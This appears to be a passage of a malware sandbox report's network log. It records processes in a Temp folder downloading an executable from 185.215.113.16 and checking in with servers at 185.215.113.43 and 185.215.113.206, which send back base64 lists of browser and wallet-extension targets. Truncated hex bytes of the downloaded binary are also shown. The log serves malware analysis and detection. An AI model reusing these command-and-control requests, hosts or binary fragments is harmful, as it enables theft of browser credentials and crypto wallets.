                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270641088 CET212INData Raw: 82 46 ed 34 b6 19 7c a6 d6 a2 43 4f 18 ae 03 59 79 ce 23 40 96 44 14 c6 ad 25 64 03 7a 51 de 81 9d fd 33 48 f8 9d 8e c5 86 01 65 47 d8 71 e4 4f 18 d9 75 ae b8 05 68 63 2c 36 f5 da 9c 16 6a 5b 44 ff 52 a5 88 ae fc f6 d1 5c 04 cf 11 13 ed 78 64 b6
                                                                                                                                                                                                                                              Data Ascii: F4|COYy#@D%dzQ3HeGqOuhc,6j[DR\xdH^hPlIuUS"?;QF~PHW/`y$PEHP=PLSJJ^]Fh|BDu"bXy W;xpqG)On_VPcs
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270658016 CET1236INData Raw: 76 41 4a db c6 dd fd 8a a5 b8 f7 5a e7 03 bd 5f f4 ae 1d a7 b7 9f 6f 03 f9 1d 5c 7b 20 b6 cc 56 ac 29 60 b8 8e 2d 1e 50 44 a6 b3 53 bc 36 0e 3d d8 76 e4 4f 64 d9 9a a8 a8 03 28 cd 6c 19 1e 1f be 3b f5 ca e4 c7 63 2f e3 9d fc c7 21 59 1c a6 d5 9c
                                                                                                                                                                                                                                              Data Ascii: vAJZ_o\{ V)`-PDS6=vOd(l;c/!YC?MSeFPPAyY*3Y\zUJO]'_il^Q1t8KH;Y>5eS` i-X5BUJ>#Wpd
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.270674944 CET1236INData Raw: 70 b8 0a c9 54 f7 84 1f 19 ae d3 59 aa ce 1b 6d 05 a6 e3 64 ce b5 9f 34 90 b2 13 33 5f cd f4 46 e0 1d c0 1b 9d 2d 53 97 35 ae 4f 3f 5f 23 08 93 00 b5 40 bf 9c ae 73 7b 46 07 14 c8 c6 3d e4 f2 18 dc 74 58 ec c7 0d 07 a6 79 e4 b6 22 de 1f ae 1e 8d
                                                                                                                                                                                                                                              Data Ascii: pTYmd43_F-S5O?_#@s{F=tXy"u"?og)ew/yhWYGO$k&~<_t#fd)gMg_P3#OfaS*S[+`~k9q1L827YZ
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:21.275567055 CET1236INData Raw: f1 e9 dc c0 14 ae eb ca 1c bb c0 6f 6c e1 83 d8 ad 4d e5 28 ce 35 48 27 5f 5d f5 46 70 19 d0 40 f6 a9 4c a3 28 85 f5 a6 d8 d4 b6 c5 ef dd 67 ab a4 d9 1a 53 35 ae 9d 53 18 28 ef 4a bc ae fc 6e a5 3e a0 87 02 21 21 7f 35 ae 33 3f 24 23 1e eb dd 83
                                                                                                                                                                                                                                              Data Ascii: olM(5H'_]Fp@L(gS5S(Jn>!!53?$#u"9M@{LKwi\4mP#.?z1vOuz0||PyDK_R"%}P0XGY]iyLh-s^pPF


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              8192.168.2.463895185.215.113.43805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.582989931 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 30 33 33 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                              Data Ascii: d1=1003344001&unit=246122658369
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.520318985 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:26 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              9192.168.2.463898185.215.113.16805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.819185019 CET55OUTGET /well/random.exe HTTP/1.1
                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760615110 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:27 GMT
                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                              Content-Length: 919552
                                                                                                                                                                                                                                              Last-Modified: Sat, 02 Nov 2024 05:01:44 GMT
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              ETag: "6725b238-e0800"
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 30 b2 25 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL0%g"Xw@`@@@d|@(u4@.text `.rdata@@.datalpH@.rsrc(@@@.relocuv@B
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760656118 CET112INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00
                                                                                                                                                                                                                                              Data Ascii: tM8h#DYh#DYh#DrYY<h
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760665894 CET1236INData Raw: fd 23 44 00 e8 61 f0 01 00 59 c3 51 e8 a9 00 00 00 68 02 24 44 00 e8 4f f0 01 00 59 c3 a1 30 14 4d 00 51 8b 40 04 05 30 14 4d 00 50 e8 e3 23 00 00 68 17 24 44 00 e8 2f f0 01 00 59 c3 e8 de 25 00 00 68 1c 24 44 00 e8 1e f0 01 00 59 c3 e8 ae e7 01
                                                                                                                                                                                                                                              Data Ascii: #DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3M0IMMVQfMo0
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760726929 CET1236INData Raw: c9 0f 85 75 10 04 00 33 db 89 5f dc 8b 4f c4 85 c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02
                                                                                                                                                                                                                                              Data Ascii: u3_OO_`d<IvY|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY94
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760740042 CET424INData Raw: eb f3 56 8b f1 8d 4e 20 e8 b2 b5 00 00 8b ce e8 ab b5 00 00 6a 40 56 e8 d0 e3 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 53 8b d9 56 57 80 7b 0d 00 8b 7b 08 75 29 8b 45 08 8b cf 8b 30 e8 7e b5 00 00 89 37 c7 47 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f
                                                                                                                                                                                                                                              Data Ascii: VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuO
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760757923 CET1236INData Raw: 00 e8 20 4c 00 00 6a 04 e8 45 e2 01 00 c7 04 24 7c c9 49 00 83 20 00 89 06 ff 15 20 c7 49 00 89 46 04 8b c6 5e c3 6a 10 8d 41 04 5a 83 20 00 8d 40 08 83 ea 01 75 f5 8b c1 c3 53 56 8b 35 98 c6 49 00 33 db 57 8b f9 6a 05 58 53 89 07 89 47 04 66 c7
                                                                                                                                                                                                                                              Data Ascii: LjE$|I IF^jAZ @uSV5I3WjXSGfG____j[GSjG)ShG&ShG'SjG(SjG$G%_^[UQW3EWPWh }IEjWWh %MI_U=Mt_E%\M%PM
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760770082 CET1236INData Raw: f8 85 ff 0f 84 c3 00 00 00 8d 4a ff 89 0d 28 15 4d 00 8b 4f 04 8b 31 66 83 7e 08 00 75 d3 8b 36 83 fe 20 74 05 83 fe 2b 75 c7 83 fe 2b 0f 94 c3 33 c0 83 fe 2b 0f 94 c0 8d 04 85 04 00 00 00 8b 0c 08 66 83 79 08 34 0f 85 1b 07 04 00 8b 09 83 ec 10
                                                                                                                                                                                                                                              Data Ascii: J(MO1f~u6 t+u+3+fy4AEAEARUE{lMG3+DfxGuBAEESPEPEPWDMnwU%lMc3_^[jiXlU<SVMM
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760782957 CET424INData Raw: 41 04 6a 7f 59 66 39 48 08 0f 85 c7 04 04 00 8b 45 f4 48 4f 83 bd 54 ff ff ff 00 89 45 f4 0f 84 9e 02 04 00 80 bd 5d ff ff ff 00 8b 45 bc 0f 85 96 02 04 00 8b 18 8d 8d 54 ff ff ff e8 70 02 00 00 8b 85 58 ff ff ff 89 45 bc 8b 45 f4 85 c0 0f 88 92
                                                                                                                                                                                                                                              Data Ascii: AjYf9HEHOTE]ETpXEE;1uuuuSRu3SxMxl`MTM_^[rU]
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760796070 CET1236INData Raw: 45 c8 0f 85 8f 00 00 00 8b 18 8d 8d 78 ff ff ff e8 f4 00 00 00 8b 85 7c ff ff ff 89 45 c8 8b 45 f0 85 c0 78 08 3b fb 0f 84 b9 fb ff ff 56 68 93 00 00 00 e9 36 03 04 00 8b 41 04 6a 7f 59 66 39 48 08 0f 85 e6 02 04 00 8b 55 f8 4a 4f 83 bd 60 ff ff
                                                                                                                                                                                                                                              Data Ascii: Ex|EEx;Vh6AjYf9HUJO`UtFiEu?`dUEx;_Vjx]@i]@I2#@"*D#&@3&@0%@v&@'@B&@&@$@;$@UE;#M~#M
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760842085 CET1236INData Raw: ff 35 58 13 4d 00 ff d6 68 a4 00 00 00 ff 35 58 13 4d 00 a3 e0 13 4d 00 ff d6 68 a2 00 00 00 ff 35 58 13 4d 00 a3 e8 13 4d 00 ff d6 33 f6 a3 ec 13 4d 00 56 6a 10 6a 10 6a 01 6a 63 ff 35 58 13 4d 00 ff 15 a0 c5 49 00 8b 0d 58 13 4d 00 8b d0 a1 e0
                                                                                                                                                                                                                                              Data Ascii: 5XMh5XMMh5XMM3MVjjjjc5XMIXMMEEPME0E#uuM}]uEIUEV1@0I5MfTM5MQv_^[VW5,I3W5XMWWjdh,PPhIPPWW5XMMj
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.765804052 CET1236INData Raw: c2 08 00 55 8b ec 8b 11 3b 51 1c 7d 1e 8d 42 01 89 01 8b 41 18 8b 4d 08 3b 0c 90 74 08 ff 34 90 e8 21 78 00 00 b0 01 5d c2 04 00 8b 4d 08 68 08 cc 49 00 e8 9e 3a 00 00 32 c0 eb eb 56 57 8b f9 8d 77 14 8b ce e8 15 37 00 00 83 27 00 8b ce c6 47 24
                                                                                                                                                                                                                                              Data Ascii: U;Q}BAM;t4!x]MhI:2VWw7'G$4I7v-YO_^gU=hMtP3hPhMTPMLHHPPjIUuUuMYY]U


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              10192.168.2.463908185.215.113.206804136C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.263741970 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:29.188654900 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:29 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:29.337538004 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----KKJJEBFCGDAKFIEBAAFB
                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                              Content-Length: 211
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 39 41 38 37 30 36 32 39 46 31 31 34 34 38 34 35 36 39 33 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 2d 2d 0d 0a
                                                                                                                                                                                                                                              Data Ascii: ------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="hwid"A89A870629F11448456937------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="build"tale------KKJJEBFCGDAKFIEBAAFB--
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:29.638623953 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:29 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Content-Length: 180
                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Data Raw: 4d 7a 41 31 4f 44 59 79 4d 6a 63 32 59 6d 4d 79 4d 54 6b 78 59 57 5a 6c 4e 47 59 32 59 6d 52 6c 4f 54 49 32 4e 6d 59 78 59 57 52 6a 4d 54 49 30 4f 54 52 6d 4e 7a 64 6d 4e 54 52 69 4e 32 45 33 59 6a 41 35 59 7a 59 34 5a 6d 46 6c 4e 54 51 32 4f 57 4e 6c 4f 47 56 6c 5a 44 67 79 5a 6a 67 35 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                              Data Ascii: MzA1ODYyMjc2YmMyMTkxYWZlNGY2YmRlOTI2NmYxYWRjMTI0OTRmNzdmNTRiN2E3YjA5YzY4ZmFlNTQ2OWNlOGVlZDgyZjg5fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:29.649538994 CET470OUTPOST /6c4adf523b719729.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----KFIJJJEBGCFBGDHIDGCA
                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                              Content-Length: 268
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 4a 45 42 47 43 46 42 47 44 48 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 35 38 36 32 32 37 36 62 63 32 31 39 31 61 66 65 34 66 36 62 64 65 39 32 36 36 66 31 61 64 63 31 32 34 39 34 66 37 37 66 35 34 62 37 61 37 62 30 39 63 36 38 66 61 65 35 34 36 39 63 65 38 65 65 64 38 32 66 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 4a 45 42 47 43 46 42 47 44 48 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 4a 45 42 47 43 46 42 47 44 48 49 44 47 43 41 2d 2d 0d 0a
                                                                                                                                                                                                                                              Data Ascii: ------KFIJJJEBGCFBGDHIDGCAContent-Disposition: form-data; name="token"305862276bc2191afe4f6bde9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89------KFIJJJEBGCFBGDHIDGCAContent-Disposition: form-data; name="message"browsers------KFIJJJEBGCFBGDHIDGCA--
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:29.936938047 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:29 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Content-Length: 2064
                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 58 45 64 76 62 32 64 73 5a 56 78 63 51 32 68 79 62 32 31 6c 58 46 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 63 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4d 48 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 57 31 70 5a 32 39 38 58 45 46 74 61 57 64 76 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEdvb2dsZVxcQ2hyb21lXFxBcHBsaWNhdGlvblxcfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8MHxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8QW1pZ298XEFtaWdvXFVzZXIgRGF0YXxjaHJvbWV8MHwwfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfDB8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8JUxPQ0FMQVBQREFUQSVcXFZpdmFsZGlcXEFwcGxpY2F0aW9uXFx8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8MHxFcGljUHJpdmFjeUJyb3dzZXJ8XEVwaWMgUHJpdmFjeSBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8ZXBpYy5leGV8JUxPQ0FMQVBQREFUQSVcXEVwaWMgUHJpdmFjeSBCcm93c2VyXFxBcHBsaWNhdGlvblxcfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicm93c2VyLmV4ZXxDOlxcUHJvZ3JhbSBGaWxlc1xcQ29jQ29jXFxCcm93c2VyXFxBcHBsaWNhdGlvblxcfEJyYXZlfFxCcmF2ZVNvZnR3YXJlXEJyYXZlLUJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicmF2ZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEJyYXZlU29mdHdhcmVcXEJyYXZlLUJyb3dz
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:29.936963081 CET1056INData Raw: 5a 58 4a 63 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 46 78 38 51 32 56 75 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47
                                                                                                                                                                                                                                              Data Ascii: ZXJcXEFwcGxpY2F0aW9uXFx8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcXENlbnRCcm93c2VyXFxBcHBsaWNhdGlvblxcfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXI
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:29.947288036 CET469OUTPOST /6c4adf523b719729.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHI
                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                              Content-Length: 267
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 35 38 36 32 32 37 36 62 63 32 31 39 31 61 66 65 34 66 36 62 64 65 39 32 36 36 66 31 61 64 63 31 32 34 39 34 66 37 37 66 35 34 62 37 61 37 62 30 39 63 36 38 66 61 65 35 34 36 39 63 65 38 65 65 64 38 32 66 38 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 2d 2d 0d 0a
                                                                                                                                                                                                                                              Data Ascii: ------EHDHDHIECGCAEBFIIDHIContent-Disposition: form-data; name="token"305862276bc2191afe4f6bde9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89------EHDHDHIECGCAEBFIIDHIContent-Disposition: form-data; name="message"plugins------EHDHDHIECGCAEBFIIDHI--
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:30.235161066 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:30 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Content-Length: 7116
                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
